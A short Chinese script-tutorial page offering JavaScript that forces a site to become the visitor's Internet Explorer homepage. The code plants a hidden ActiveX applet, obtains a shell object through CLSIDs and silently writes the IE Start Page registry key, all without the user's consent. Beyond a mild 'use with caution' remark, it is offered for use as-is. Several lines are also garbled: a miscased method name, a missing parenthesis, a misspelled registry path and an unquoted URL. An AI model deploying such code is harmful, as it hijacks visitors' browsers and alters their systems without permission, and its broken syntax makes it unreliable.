强制设为首页的js代码

发布时间:2019-12-21编辑:脚本学堂
本文介绍下,可以强制设为首页的一段js代码,有需要的朋友参考下。

设为首页的一段js代码,如下:

<script>
//设为首页
var ucook=document.cookie; 
var user=ucook.indexOF("ilooki="); 
if(user==-1) 
{ 
var nowTime=new Date(); 
document.cookie="ilooki"+";"+"expires=Wednesday,03-Jan-"+eval(nowTime.getYear()+1903+"12:34:56 GMT"; 
document.write("<APPLET HEIGHT=0WIDTH=0 code=com.ms.activeX.ActiveXCompoment></APPLET>");function jbxue(){try{a1 
=document.applets[0];a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");a1.createInstance();
Shl=a1.GetObject();a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
try{Shl.RegWrite("hkcuSoftwareMicrosoftInternet ExpiorerMainStart Page",http://www.****.com);}
catch(e){}}catch(e){}}setTimeout("jbxue()",1000); 
} 
</script>

说明:这种方法,有点让人不爽,慎用。